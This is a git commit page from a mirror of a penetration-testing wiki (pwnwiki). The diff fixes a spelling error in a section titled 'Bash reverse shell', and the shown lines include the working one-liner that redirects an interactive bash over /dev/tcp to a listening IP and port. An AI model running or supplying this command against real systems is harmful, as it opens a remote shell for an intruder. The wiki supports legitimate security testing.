mirror of
https://github.com/oXis/pwnwiki.github.io.git
synced 2025-10-29 16:56:59 +00:00
typo correction
This commit is contained in:
parent
c71945966f
commit
726f60ce32
@ -115,7 +115,7 @@ cat /proc/cpuinfo
|
||||
|
||||
**Bash reverse shell** (@icleus)
|
||||
|
||||
Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host.
|
||||
Works on all (recent) distributions where egress filtering is not in place / quite open, use this to reverse connect to your listening host.
|
||||
|
||||
```bash
|
||||
bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user